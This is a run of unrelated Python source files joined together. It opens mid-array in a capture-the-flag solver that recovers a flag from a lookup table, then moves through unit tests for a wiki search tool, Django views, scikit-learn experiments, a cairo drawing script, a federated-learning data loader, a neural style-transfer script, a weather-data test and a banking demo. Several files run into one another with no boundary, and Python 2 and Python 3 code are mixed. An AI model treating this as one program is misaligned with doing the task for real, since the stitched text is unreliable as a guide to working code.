0x0B9,0x5C,0x9,0x5D,0x69,0x5E,0x0BA,0x5F,0x99,0x60,0x48,
0x61,0x73,0x62,0x0B1,0x63,0x7C,0x64,0x82,0x65,0x0BE,
0x66,0x27,0x67,0x9D,0x68,0x0FB,0x69,0x67,0x6A,0x7E,0x6B,
0x0F4,0x6C,0x0B3,0x6D,0x5,0x6E,0x0C2,0x6F,0x5F,0x70,0x1B,
0x71,0x54,0x72,0x23,0x73,0x71,0x74,0x11,0x75,0x30,0x76,
0xD2,0x77,0x0A5,0x78,0x68,0x79,0x9E,0x7A,0x3F,0x7B,
0x0F5,0x7C,0x7A,0x7D,0x0CE,0x7E,0x0B,0x7F,0x0C,0x80,
0x85,0x81,0x0DE,0x82,0x63,0x83,0x5E,0x84,0x8E,0x85,0x0BD,
0x86,0x0FE,0x87,0x6A,0x88,0x0DA,0x89,0x26,0x8A,0x88,
0x8B,0x0E8,0x8C,0x0AC,0x8D,0x3,0x8E,0x62,0x8F,0x0A8,0x90,
0x0F6,0x91,0x0F7,0x92,0x75,0x93,0x6B,0x94,0x0C3,0x95,
0x46,0x96,0x51,0x97,0x0E6,0x98,0x8F,0x99,0x28,0x9A,0x76,
0x9B,0x5A,0x9C,0x91,0x9D,0x0EC,0x9E,0x1F,0x9F,0x44,0x0A0,
0x52,0x0A1,0x1,0x0A2,0x0FC,0x0A3,0x8B,0x0A4,0x3A,0x0A5,
0x0A1,0x0A6,0x0A3,0x0A7,0x16,0x0A8,0x10,0x0A9,0x14,0x0AA,
0x50,0x0AB,0x0CA,0x0AC,0x95,0x0AD,0x92,0x0AE,0x4B,0x0AF,
0x35,0x0B0,0x0E,0x0B1,0x0B5,0x0B2,0x20,0x0B3,0x1D,0x0B4,
0x5D,0x0B5,0x0C1,0x0B6,0x0E2,0x0B7,0x6E,0x0B8,0x0F,0x0B9,
0x0ED,0x0BA,0x90,0x0BB,0x0D4,0x0BC,0x0D9,0x0BD,0x42,
0x0BE,0x0DD,0x0BF,0x98,0x0C0,0x57,0x0C1,0x37,0x0C2,0x19,
0x0C3,0x78,0x0C4,0x56,0x0C5,0x0AF,0x0C6,0x74,0x0C7,0x0D1,
0x0C8,0x4,0x0C9,0x29,0x0CA,0x55,0x0CB,0x0E5,0x0CC,0x4C,
0x0CD,0x0A0,0x0CE,0x0F2,0x0CF,0x89,0x0D0,0x0DB,0x0D1,
0x0E4,0x0D2,0x38,0x0D3,0x83,0x0D4,0x0EA,0x0D5,0x17,0x0D6,
0x7,0x0D7,0x0DC,0x0D8,0x8C,0x0D9,0x8A,0x0DA,0x0B4,0x0DB,
0x7B,0x0DC,0x0E9,0x0DD,0x0FF,0x0DE,0x0EB,0x0DF,0x15,
0x0E0,0x0D,0x0E1,0x2,0x0E2,0x0A2,0x0E3,0x0F3,0x0E4,0x34,
0x0E5,0x0CC,0x0E6,0x18,0x0E7,0x0F8,0x0E8,0x13,0x0E9,
0x8D,0x0EA,0x7F,0x0EB,0x0AE,0x0EC,0x21,0x0ED,0x0E3,0x0EE,
0x0CD,0x0EF,0x4D,0x0F0,0x70,0x0F1,0x53,0x0F2,0x0FD,0x0F3,
0x0AB,0x0F4,0x72,0x0F5,0x64,0x0F6,0x1C,0x0F7,0x66,0x0F8,
0x0A9,0x0F9,0x0B0,0x0FA,0x1E,0x0FB,0x0D7,0x0FC,0x0DF,
0x0FD,0x36,0x0FE,0x7D,0x0FF]
output=[39, 179, 115, 157, 245, 17, 231, 177,
179, 190, 153, 179, 249, 249, 244, 48,
27, 113, 153, 115, 35, 101, 153, 177,
101, 17, 17, 190, 35, 153, 39, 249,
35, 153, 5, 101, 206]
# (Python 2.)  Recover each flag character: find the output byte in
# byte_table and print the entry stored just before it — the table
# appears to hold (plain, encoded) adjacent pairs; TODO confirm layout.
print 'array size ='+str(len(byte_table))
print 'output size ='+str(len(output))
#flag{t4ble_l00kups_ar3_b3tter_f0r_m3}
for i in range(len(output)):
    print str(i)+' th: '
    for j in range(len(byte_table)):
        if byte_table[j]==output[i]:
            # Only print printable-ASCII candidates.  NOTE(review):
            # when j == 0, byte_table[j-1] wraps to the LAST element —
            # confirm that is intended.
            if byte_table[j-1]<126 and byte_table[j-1]>33:
                print chr(byte_table[j-1])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
import yaml
import indexer
import searcher
import api
import frontend
from indexer import stripTag
from searcher import binaryIndexSearch
class TestUM(unittest.TestCase):
    """Unit tests for the wiki indexer/searcher pipeline."""
    # Test configuration mirroring .config/config_test.yml: dump and
    # index file locations plus the frontend host/port.
    config = {'PATH_WIKI_XML': 'testdata', 'PATH_INDEX_FILES': 'testdata/index', 'FILENAME_WIKI': 'dump.xml', 'FILENAME_INDEX': 'index.txt', 'FILENAME_SORTED_INDEX': 'sorted_index.txt', 'HOSTNAME': 'localhost', 'PORT': '5000'}
    def testIndexerMain(self):
        # A successful end-to-end indexing run returns None.
        self.assertEqual( indexer.main(".config/config_test.yml"), None)
    def testIndexerStripTag(self):
        # stripTag drops the XML namespace prefix; bare tags pass through.
        self.assertEqual( stripTag('{http://www.mediawiki.org/xml/export-0.10/}title'), 'title')
        self.assertEqual( stripTag('title'), 'title')
        # NOTE(review): `with A and B` only enters ONE context manager
        # (`and` picks an operand) — nested assertRaises was probably
        # intended; confirm.
        with self.assertRaises(TypeError) and self.assertRaises(SystemExit):
            stripTag('conclusion xyz xyz')
    def testSearcherBinaryIndexSearch(self):
        # binaryIndexSearch(rows, term) -> (match_or_prefix_list, is_prefix).
        self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], 'c'), (['c','2','5','None'], False))
        self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], 'd'), (['c','2','5','None'], False))
        self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], 'e'), (False, False))
        # Prefix hit: returns the matching words and is_prefix == True.
        self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], 'a'), (['ab','abc'], True))
        # Degenerate inputs: empty index, empty term, malformed row.
        self.assertEqual( binaryIndexSearch([], 'a'), (False, False))
        self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','2','5','None'],['d','4','6','c']], ''), (False, False))
        self.assertEqual( binaryIndexSearch([['ab','2','3','None'],['abc','8','4','None'],['c','5','None'],['d','4','6','c']], 'c'), (False, False))
if __name__ == '__main__':
    unittest.main()
from django.shortcuts import render, redirect
from repository import models
from backend.auth import auth
@auth.check_login
def manage_index(request):
    """Render the backend management home page.

    :param request: Django HttpRequest; the logged-in user's info is
        read from the session (presence enforced by @auth.check_login).
    :return: rendered backend/backend_index.html response
    """
    context = {
        'user_info': request.session.get('user_info'),
    }
    # Leftover debug print of the session user removed.
    return render(request, 'backend/backend_index.html', context)
@auth.check_login
def base_info(request):
    """Render the backend user-info page (no extra context needed)."""
    return render(request, 'backend/backend_user_info.html')
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import svm, metrics
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.pipeline import Pipeline
from skimage import io
from skimage.transform import resize
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.gaussian_process.kernels import RBF
#Aqui los datos junto con su categoria (image_name, categoria)
# Load the (image path, label) pairs.  NOTE(review): test.txt is used
# for TRAINING here and train.txt for evaluation below — confirm the
# swap is intentional.
data = pd.read_csv('oxford-102-flowers/test.txt', delimiter=' ',
                   header=None).values
n_samples = data.shape[0]
images = []
for i in range(n_samples):
    # Normalise pixel values to [0, 1] and resize to 64x64, then
    # flatten each image into one feature row.
    img = io.imread('oxford-102-flowers/'+data[i,0])/255
    img = resize(img, (64,64))
    images.append(img.ravel())
    if i%500 == 0:
        print(i)  # progress indicator
images = np.array(images)
x = np.asanyarray(images)
# BUG FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24;
# the builtin int is the documented replacement.
y = np.asanyarray(data[:,1], dtype=int)[:n_samples]
# Dimensionality reduction + Gaussian-process classifier (earlier
# experiments with SVM/KNN/MLP/decision trees were removed).
model = Pipeline([
    ('pca', PCA(n_components=128)),
    ("GP", GaussianProcessClassifier(1.0 * RBF(1.0)))])
model.fit(x, y)
print ("Train: ", model.score(x, y))
#*************************************************************
#Aqui los datos junto con su categoria (image_name, categoria)
# Evaluation set (see swap note above: train.txt is scored as "Test").
data2 = pd.read_csv('oxford-102-flowers/train.txt', delimiter=' ',
                    header=None).values
xtest = []
# Only the first 200 entries are evaluated (keeps runtime manageable).
n_samples2 = 200
for i in range(n_samples2):
    # Same preprocessing as the training images: [0, 1] range, 64x64,
    # flattened.
    img = io.imread('oxford-102-flowers/'+data2[i,0])/255
    img = resize(img, (64,64))
    xtest.append(img.ravel())
xtest = np.array(xtest)
# BUG FIX: np.int was removed in NumPy 1.24; use the builtin int.
ytest = np.asanyarray(data2[:,1], dtype=int)[:n_samples2]
print ("Test: ", model.score(xtest, ytest))
|
#!/users/jgrey/anaconda/bin/python
import sys
import time
import math
import cairo
import draw_routines
import logging
#constants
N = 12
X = pow(2,N)
Y = pow(2,N)
imgPath = "./imgs/"
imgName = "initialTest"
currentTime = time.gmtime()
FONT_SIZE = 0.03
# Output name: imgs/initialTest_MIN-HOUR_DAY-MON_YEAR.
# BUG FIX: the original format string had only six placeholders for
# seven arguments, so str.format silently dropped tm_year.
saveString = "{}{}_{}-{}_{}-{}_{}".format(imgPath,
                                          imgName,
                                          currentTime.tm_min,
                                          currentTime.tm_hour,
                                          currentTime.tm_mday,
                                          currentTime.tm_mon,
                                          currentTime.tm_year)
#get the type of drawing to do from the command line argument:
if len(sys.argv) > 1:
    drawRoutineName = sys.argv[1]
else:
    drawRoutineName = "circles"
#setup logging: everything to log.<routine>, INFO+ echoed to console
LOGLEVEL = logging.DEBUG
logFileName = "log.{}".format(drawRoutineName)
logging.basicConfig(filename=logFileName,level=LOGLEVEL,filemode='w')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
logging.getLogger('').addHandler(console)
#setup cairo: ARGB surface, unit-square coordinates, fixed font size
surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, X,Y)
ctx = cairo.Context(surface)
ctx.scale(X,Y)
ctx.set_font_size(FONT_SIZE)
#Drawing:
draw_routines.draw(ctx,drawRoutineName,X,Y,surface=surface,filenamebase=saveString)
|
from numpy import mean
from numpy import std
from sklearn.datasets import make_regression
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import RepeatedKFold
from sklearn.linear_model import LinearRegression
from sklearn.neighbors import KNeighborsRegressor
from sklearn.tree import DecisionTreeRegressor
from sklearn.svm import SVR
from sklearn.ensemble import StackingRegressor
from matplotlib import pyplot
# get the dataset
def get_dataset():
    """Create the synthetic regression benchmark (1000 samples, 20 features,
    15 informative) used throughout this comparison."""
    features, target = make_regression(
        n_samples=1000, n_features=20, n_informative=15, noise=0.1, random_state=1
    )
    return features, target
# get a stacking ensemble of models
def get_stacking():
    """Build a 5-fold stacking ensemble: KNN/CART/SVR bases with a
    linear-regression meta-learner."""
    base_models = [
        ('knn', KNeighborsRegressor()),
        ('cart', DecisionTreeRegressor()),
        ('svm', SVR()),
    ]
    meta_learner = LinearRegression()
    return StackingRegressor(estimators=base_models, final_estimator=meta_learner, cv=5)
# get a list of models to evaluate
def get_models():
    """Map display names to unfitted estimators: the three base models
    plus the stacking ensemble built from them."""
    return {
        'knn': KNeighborsRegressor(),
        'cart': DecisionTreeRegressor(),
        'svm': SVR(),
        'stacking': get_stacking(),
    }
# evaluate a given model using cross-validation
def evaluate_model(model, X=None, y=None):
    """Score a model with repeated 10-fold CV (negated MAE).

    The original silently depended on module-level globals X and y; they
    are now explicit optional parameters (backward compatible: omitting
    them falls back to the globals, as before).

    @param model: an unfitted sklearn estimator
    @param X: feature matrix (defaults to the module-level dataset)
    @param y: target vector (defaults to the module-level dataset)
    @return: array of per-fold scores (higher, i.e. closer to 0, is better)
    """
    if X is None or y is None:
        X, y = globals()["X"], globals()["y"]
    cv = RepeatedKFold(n_splits=10, n_repeats=3, random_state=1)
    scores = cross_val_score(model, X, y, scoring='neg_mean_absolute_error',
                             cv=cv, n_jobs=-1, error_score='raise')
    return scores
if __name__ == '__main__':
    # define dataset
    X, y = get_dataset()
    # get the models to evaluate
    models = get_models()
    # evaluate the models and store results
    results, names = list(), list()
    for name, model in models.items():
        scores = evaluate_model(model)
        results.append(scores)
        names.append(name)
        # scores are negated MAE, so values closer to zero are better
        print('>%s %.3f (%.3f)' % (name, mean(scores), std(scores)))
    # plot model performance for comparison
    pyplot.boxplot(results, labels=names, showmeans=True)
    pyplot.show()
from datasetLoaders.DatasetInterface import DatasetInterface
import os
import random
import re
from typing import List, Tuple, Type
import numpy as np
import pandas as pd
import torch
from torch import Tensor, cuda
from pandas import DataFrame
# from cn.protect import Protect
# from cn.protect.privacy import KAnonymity
class DatasetLoader:
    """Parent class used for specifying the data loading workflow.

    Subclasses implement getDatasets(); the helpers here handle label
    filtering, per-client splitting, seeding, and (partially disabled)
    syntactic anonymisation support.
    """

    def getDatasets(self, percUsers: Tensor, labels: Tensor, size=(None, None)):
        """Abstract hook: load/filter/split data for the federated clients.

        @param percUsers: per-client share of the training data
        @param labels: labels to keep
        @param size: optional (train, test) size caps
        """
        # NotImplementedError is the idiomatic marker for an abstract hook;
        # it subclasses Exception, so existing broad handlers still work.
        raise NotImplementedError(
            "LoadData method should be override by child class, "
            "specific to the loaded dataset strategy."
        )

    @staticmethod
    def _filterDataByLabel(
        labels: Tensor, trainDataframe: DataFrame, testDataframe: DataFrame
    ) -> Tuple[DataFrame, DataFrame]:
        """
        Creates the train and test dataframes with only the labels specified
        """
        wanted = labels.tolist()
        trainDataframe = trainDataframe[trainDataframe["labels"].isin(wanted)]
        testDataframe = testDataframe[testDataframe["labels"].isin(wanted)]
        return trainDataframe, testDataframe

    @staticmethod
    def _splitTrainDataIntoClientDatasets(
        percUsers: Tensor, trainDataframe: DataFrame, DatasetType: Type[DatasetInterface]
    ) -> List[DatasetInterface]:
        """
        Splits train dataset into individual datasets for each client.
        Uses percUsers to decide how much data (by %) each client should get.
        """
        DatasetLoader._setRandomSeeds()
        # normalise shares so they sum to 1 regardless of caller input
        percUsers = percUsers / percUsers.sum()
        dataSplitCount = (percUsers.cpu() * len(trainDataframe)).floor().numpy()
        # cumulative offsets (dropping the leading 0) become np.split boundaries
        _, *dataSplitIndex = [
            int(sum(dataSplitCount[range(i)])) for i in range(len(dataSplitCount))
        ]
        # Sample and reset_index shuffles the dataset in-place and resets the index
        trainDataframes: List[DataFrame] = np.split(
            trainDataframe.sample(frac=1).reset_index(drop=True), indices_or_sections=dataSplitIndex
        )
        clientDatasets: List[DatasetInterface] = [
            DatasetType(clientDataframe.reset_index(drop=True))
            for clientDataframe in trainDataframes
        ]
        return clientDatasets

    @staticmethod
    def _setRandomSeeds(seed=0) -> None:
        """Seed every RNG in play (hash, random, numpy, torch CPU+CUDA)
        so client splits are reproducible."""
        os.environ["PYTHONHASHSEED"] = str(seed)
        random.seed(seed)
        np.random.seed(seed)
        torch.manual_seed(seed)
        cuda.manual_seed(seed)

    # When anonymizing the clients' datasets using _anonymizeClientDatasets the function passed as
    # parameter should take as parameter the cn.protect object and set ds specific generalisations
    # @staticmethod
    # def _anonymizeClientDatasets(
    #         clientDatasets, columns, k, quasiIds, setHierarchiesMethod
    # ):
    #     datasetClass = clientDatasets[0].__class__
    #     resultDataframes = []
    #     clientSyntacticMappings = []
    #     dataframes = [
    #         DataFrame(list(ds.dataframe["data"]), columns=columns)
    #         for ds in clientDatasets
    #     ]
    #     for dataframe in dataframes:
    #         anonIndex = (
    #             dataframe.groupby(quasiIds)[dataframe.columns[0]].transform("size") >= k
    #         )
    #         anonDataframe = dataframe[anonIndex]
    #         needProtectDataframe = dataframe[~anonIndex]
    #         protect = Protect(needProtectDataframe, KAnonymity(k))
    #         protect.quality_model = quality.Loss()
    #         protect.suppression = 0
    #         for qid in quasiIds:
    #             protect.itypes[qid] = "quasi"
    #         setHierarchiesMethod(protect)
    #         protectedDataframe = protect.protect()
    #         mappings = protectedDataframe[quasiIds].drop_duplicates().to_dict("records")
    #         clientSyntacticMappings.append(mappings)
    #         protectedDataframe = pd.get_dummies(protectedDataframe)
    #         resultDataframe = (
    #             pd.concat([anonDataframe, protectedDataframe]).fillna(0).sort_index()
    #         )
    #         resultDataframes.append(resultDataframe)
    #     # All clients datasets should have same columns
    #     allColumns = set().union(*[df.columns.values for df in resultDataframes])
    #     for resultDataframe in resultDataframes:
    #         for col in allColumns - set(resultDataframe.columns.values):
    #             resultDataframe[col] = 0
    #     # Create new datasets by adding the labels to
    #     anonClientDatasets = []
    #     for resultDataframe, initialDataset in zip(resultDataframes, clientDatasets):
    #         labels = initialDataset.dataframe["labels"].values
    #         labeledDataframe = DataFrame(zip(resultDataframe.values, labels))
    #         labeledDataframe.columns = ["data", "labels"]
    #         anonClientDatasets.append(datasetClass(labeledDataframe))
    #     return anonClientDatasets, clientSyntacticMappings, allColumns

    def _anonymizeTestDataset(
        self, testDataset, clientSyntacticMappings, columns, generalizedColumns
    ):
        """Generalise the test set so its quasi-identifier columns match the
        (already anonymised) client datasets; rows no client mapping covers
        are kept ungeneralised."""
        datasetClass = testDataset.__class__
        dataframe = DataFrame(list(testDataset.dataframe["data"]), columns=columns)
        domainsSize = dict()
        quasiIds = clientSyntacticMappings[0][0].keys()
        # per-column value range, used to normalise interval widths below
        for quasiId in quasiIds:
            domainsSize[quasiId] = dataframe[quasiId].max() - dataframe[quasiId].min()
        generalisedDataframe = DataFrame(dataframe)
        ungeneralisedIndex = []
        for i in range(len(dataframe)):
            legitMappings = []
            for clientMappings in clientSyntacticMappings:
                legitMappings += [
                    mapping
                    for mapping in clientMappings
                    if self.__legitMapping(dataframe.iloc[i], mapping)
                ]
            if legitMappings:
                # pick the narrowest (least general) of all applicable mappings
                leastGeneralMapping = legitMappings[0]
                for legitMapping in legitMappings[1:]:
                    leastGeneralMapping = self.__leastGeneral(
                        leastGeneralMapping, legitMapping, domainsSize
                    )
                for col in leastGeneralMapping:
                    # FIX: .at replaces the chained df[col][i] assignment, which
                    # pandas flags (SettingWithCopy) and may silently drop
                    generalisedDataframe.at[i, col] = leastGeneralMapping[col]
            else:
                ungeneralisedIndex.append(i)
                generalisedDataframe = generalisedDataframe.drop(i)
        generalisedDataframe = pd.get_dummies(generalisedDataframe)
        ungeneralisedDataframe = dataframe.iloc[ungeneralisedIndex]
        resultDataframe = (
            pd.concat([ungeneralisedDataframe, generalisedDataframe]).fillna(0).sort_index()
        )
        for col in generalizedColumns - set(resultDataframe.columns.values):
            resultDataframe[col] = 0
        labels = testDataset.dataframe["labels"].values
        labeledDataframe = DataFrame(zip(resultDataframe.values, labels))
        labeledDataframe.columns = ["data", "labels"]
        return datasetClass(labeledDataframe)

    @staticmethod
    def __leastGeneral(map1, map2, domainSize):
        """Return whichever mapping is less general, i.e. has the smaller
        total normalised interval width over its string-valued columns."""
        map1Generality = map2Generality = 0
        for col in map1:
            if isinstance(map1[col], str):
                # FIX: np.float was removed from NumPy; builtin float is equivalent.
                # FIX: the dot in the interval regex is now escaped so "12x5" no
                # longer parses as a decimal.
                interval = np.array(re.findall(r"\d+\.\d+", map1[col]), dtype=float)
                map1Generality += (interval[1] - interval[0]) / domainSize[col]
        for col in map2:
            # FIX: this loop previously tested isinstance(map1[col], ...), so
            # map2's generality was computed against the wrong mapping.
            if isinstance(map2[col], str):
                interval = np.array(re.findall(r"\d+\.\d+", map2[col]), dtype=float)
                map2Generality += (interval[1] - interval[0]) / domainSize[col]
        return map1 if map1Generality <= map2Generality else map2

    @staticmethod
    def __legitMapping(entry, mapping) -> bool:
        """True when the entry matches the mapping: equal on scalar columns,
        inside the [low, high) interval on generalised (string) columns."""
        for col in mapping:
            if not isinstance(mapping[col], str):
                if entry[col] != mapping[col]:
                    return False
            else:
                interval = np.array(re.findall(r"\d+\.\d+", mapping[col]), dtype=float)
                # FIX: the lower-bound test was inverted (interval[0] < entry
                # rejected every in-range value); entry must lie in [low, high).
                if entry[col] < interval[0] or entry[col] >= interval[1]:
                    return False
        return True
|
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import PIL
from PIL import Image
import matplotlib.pyplot as plt
import torchvision.transforms as transforms
import torchvision.models as models
######### images
imsize = 200 # desired size of the output image
# NOTE(review): transforms.Scale is the legacy (pre-0.4 torchvision) name of
# transforms.Resize -- this file targets an old torch/torchvision API.
loader = transforms.Compose([
    transforms.Scale(imsize), # scale imported image
    transforms.ToTensor()]) # transform it into a torch tensor
def image_loader(image_name):
    """Load an image file as a 1 x C x H x W autograd Variable."""
    pil_image = Image.open(image_name)
    tensor = Variable(loader(pil_image))
    # networks expect a batch axis, so prepend a singleton dimension
    return tensor.unsqueeze(0)
# load both reference images onto the GPU
style = image_loader("images/picasso.jpg").cuda()
content = image_loader("images/dancing.jpg").cuda()
assert style.data.size() == content.data.size(), "we need to import style and content images of the same size"
########## display
unloader = transforms.ToPILImage() # reconvert into PIL image
def imshow(tensor):
    # Render a 1x3xHxW tensor in the current matplotlib axes.
    image = tensor.clone().cpu() # we clone the tensor in order to not do changes on it
    image.resize_(3,imsize,imsize) # remove the fake batch dimension
    image = unloader(image)
    plt.imshow(image)
# show the style (top-left) and content (top-right) inputs
fig = plt.figure()
plt.subplot(221)
imshow(style.data)
plt.subplot(222)
imshow(content.data)
########## content loss
class ContentLoss(nn.Module):
    """Transparent layer that records the MSE distance to a fixed content target.

    Spliced into the feature stack: forward() passes its input through
    unchanged while caching the loss; backward() backprops that loss and
    returns its scalar value (legacy, pre-0.4 torch API).
    """
    def __init__(self, target, weight):
        super(ContentLoss, self).__init__()
        self.target = target.detach() * weight # we 'detach' the target content from the tree used
        # to dynamically compute the gradient: this is a stated value,
        # not a variable. Otherwise the forward method of the criterion
        # will throw an error.
        self.weight = weight
        self.criterion = nn.MSELoss()
    def forward(self, input):
        # compare the (weighted) input against the pre-scaled target;
        # the input itself flows through untouched
        self.loss = self.criterion.forward(input*self.weight, self.target)
        self.output = input
        return self.output
    def backward(self, retain_variables=True):
        # legacy API: .data[0] extracts the python scalar from a 1-element tensor
        self.loss.backward(retain_variables=retain_variables)
        return self.loss.data[0]
######### style loss
class GramMatrix(nn.Module):
    """Computes the normalised Gram matrix of a batch of feature maps."""
    def forward(self, input):
        a,b,c,d = input.data.size() # a=batch size(=1)
        # b=number of feature maps
        # (c,d)=dimensions of a f. map (N=c*d)
        # NOTE(review): resize_ mutates the *input* tensor in place -- callers
        # must not rely on the original shape afterwards.
        input.data.resize_(a*b,c*d) # resise F_XL into \hat F_XL
        G = torch.mm(input, input.t()) # compute the gram product
        return G.div_(a*b*c*d) # we 'normalize' the values of the gram matrix
        # by dividing by the number of element in each feature maps.
class StyleLoss(nn.Module):
    """Records the MSE distance between the input's Gram matrix and a fixed
    style target; like ContentLoss, it is a pass-through layer."""
    def __init__(self, target, strength):
        super(StyleLoss, self).__init__()
        # target is expected to already be a Gram matrix (see model build below)
        self.target = target.detach()*strength
        self.strength = strength
        self.gram = GramMatrix()
        self.criterion = nn.MSELoss()
    def forward(self, input):
        self.output = input.clone()
        # compare scaled Gram statistics rather than raw activations
        self.G = self.gram.forward(input)
        self.G.mul_(self.strength)
        self.loss = self.criterion.forward(self.G, self.target)
        return self.output
    def backward(self, retain_variables=True):
        # legacy API: backprop the cached loss and return its python scalar
        self.loss.backward(retain_variables=retain_variables)
        return self.loss.data[0]
####### load model
# AlexNet's convolutional feature extractor serves as the perceptual network.
cnn = models.alexnet(pretrained=True).features.cuda()
# desired depth layers to compute style/content losses :
content_layers = ['conv_3','conv_4']
style_layers = ['conv_1','conv_2','conv_3','conv_4','conv_5']
# just in order to have an iterable access to or list of content/syle losses
content_losses = []
style_losses = []
art_net = nn.Sequential().cuda() # the new Sequential module network
gram = GramMatrix().cuda() # we need a gram module in order to compute style targets
# weigth associated with content and style losses
content_weight = 5
style_weight = 500
# Rebuild the feature stack layer by layer, splicing loss modules in right
# after the conv/relu layers named in content_layers/style_layers.
# NOTE(review): the counter i is bumped only after a ReLU, so a conv and its
# following ReLU share the same index -- presumably intentional (matches the
# classic neural-style tutorial); confirm before refactoring.
i = 1
for layer in list(cnn):
    if isinstance(layer,nn.Conv2d):
        name = "conv_"+str(i)
        art_net.add_module(name,layer)
        if name in content_layers:
            # add content loss:
            # a forward pass through the partial net snapshots the target activations
            target = art_net.forward(content.cuda()).clone()
            content_loss = ContentLoss(target, content_weight).cuda()
            art_net.add_module("content_loss_"+str(i),content_loss)
            content_losses.append(content_loss)
        if name in style_layers:
            # add style loss:
            target_feature = art_net.forward(style.cuda()).clone()
            target_feature_gram = gram.forward(target_feature)
            style_loss = StyleLoss(target_feature_gram, style_weight).cuda()
            art_net.add_module("style_loss_"+str(i),style_loss)
            style_losses.append(style_loss)
    if isinstance(layer,nn.ReLU):
        name = "relu_"+str(i)
        art_net.add_module(name,layer)
        if name in content_layers:
            # add content loss:
            target = art_net.forward(content.cuda()).clone()
            content_loss = ContentLoss(target, content_weight).cuda()
            art_net.add_module("content_loss_"+str(i),content_loss)
            content_losses.append(content_loss)
        if name in style_layers:
            # add style loss:
            target_feature = art_net.forward(style.cuda()).clone()
            target_feature_gram = gram.forward(target_feature)
            style_loss = StyleLoss(target_feature_gram, style_weight).cuda()
            art_net.add_module("style_loss_"+str(i),style_loss)
            style_losses.append(style_loss)
        i+=1
    if isinstance(layer,nn.MaxPool2d):
        name = "pool_"+str(i)
        art_net.add_module(name,layer) # ***
print art_net
###### input image
# optimisation starts from the content image itself
input = image_loader("images/dancing.jpg").cuda()
# if we want to fill it with a white noise:
# input.data = torch.randn(input.data.size()).cuda()
# add the original input image to the figure:
plt.subplot(223)
imshow(input.data)
######## gradient descent
# NOTE(review): `input` shadows the builtin of the same name for the rest of
# the script -- kept as-is here (doc-only pass).
input = nn.Parameter(input.data) # this line to show that input is a parameter that requires a gradient
optimizer = optim.Adam([input], lr = 0.01)
for run in range(500):
    # correct the values of updated input image
    # (clamp pixels to [0,1] on the CPU before each optimizer step)
    updated = input.data.cpu().clone()
    updated = updated.numpy()
    updated[updated<0] = 0
    updated[updated>1] = 1
    input.data = torch.from_numpy(updated).cuda()
    optimizer.zero_grad()
    art_net.forward(input)
    style_score = 0
    content_score = 0
    # each loss module's backward() accumulates gradients into `input`
    # and returns its scalar loss
    for sl in style_losses:
        style_score += sl.backward()
    for cl in content_losses:
        content_score += cl.backward()
    optimizer.step()
    if run%10==0:
        print "run "+str(run)+":"
        print style_score
        print content_score
# a last correction...
result = input.data.cpu().clone()
result = result.numpy()
result[result<0] = 0
result[result>1] = 1
result = torch.from_numpy(result)
# finally enjoy the result:
# NOTE(review): `result` is computed but the figure shows input.data --
# possibly the clamped `result` was meant to be displayed; confirm.
plt.subplot(224)
imshow(input.data)
plt.show()
|
#This script tests the merra_dap module in WxMP
#Written by Christopher Phillips
#Import required modules
from wxmp import merra_dap as wm
import matplotlib.pyplot as pp
from datetime import datetime as dt
#Create test dates
start_date = dt.strptime("20160618", "%Y%m%d")
end_date = dt.strptime("20160621", "%Y%m%d")
#Password and username to NASA GESDISC ESODIS server
username = "your_username"
password = "your_password"
#Create merra analysis object
merra = wm.MERANL(username, password, start_date, end_date, "atmosphere")
#Print dates
print("Dates loaded: {}".format(merra.dates))
#Print number of datasets
print("Number of dates loaded: {}".format(len(merra.dataset)))
#Print grid shape
print("Shape of grid: {}".format(merra.lats.shape))
#Get the indices of a point
point = (47, -17)
x, y = merra.get_point(point)
print("Extent of domain: {}".format(merra.extent))
print("Point being tested: {}".format(point))
print("Indices of point: {}, {}".format(x, y))
print("Found point: {}, {}".format(merra.lons[y,x], merra.lats[y,x]))
#Set the new extent
region = [-60, -40, -10, 20]
merra.set_anl_region(region)
#Print regional lon/lats
print("New region: {}".format(region))
print("Regional Lons and Lats")
print(merra.rlons)
print(merra.rlats)
#Print variable list
print("Variable list: {}".format(merra.variables))
#Grab a variable
var = merra.get_var(merra.variables[0])
print("All time var shape: {}".format(var.shape))
#Now grab a variable for a specific time
var = merra.get_var(merra.variables[0], filedate=dt.strptime("2016060708", "%Y%m%d%H"))
print("Single time var shape: {}".format(var.shape))
#Plot a quick map
fig, ax = pp.subplots(subplot_kw={"projection":merra.pcp})
# FIX: capture the ContourSet so it can be handed to colorbar below
cont = ax.contourf(merra.rlons, merra.rlats, var)
ax.coastlines()
# FIX: colorbar takes the mappable positionally; `cont=cont` was both an
# unknown keyword and a reference to a name that was never assigned (NameError).
cb = fig.colorbar(cont, orientation="horizontal")
# Label with the plotted variable's name (var holds variables[0]).
cb.set_label(merra.variables[0], fontsize=14, fontweight="bold")
pp.show()
print("TEST SUCCESSFUL")
|
from banking import *
def pay_annual_interest(accounts):
    """Deposit one year's worth of interest into every interest-bearing
    (Profitable) account; other accounts are left untouched."""
    for account in accounts:
        if not isinstance(account, Profitable):
            continue
        account.deposit(account.interest(1))
# Demo: two funded accounts, one user-driven transfer, then annual interest.
jack = CurrentAccount()
jack.deposit(15000)
jill = SavingsAccount()
jill.deposit(10000)
try:
    payment = float(input('Amount to pay: '))
    if payment > 0:
        jill.transfer(payment, jack)
        print('Payment succeeded.')
except InsufficientFunds:
    # domain-specific failure raised by the banking module
    print('Payment failed due to lack of funds!')
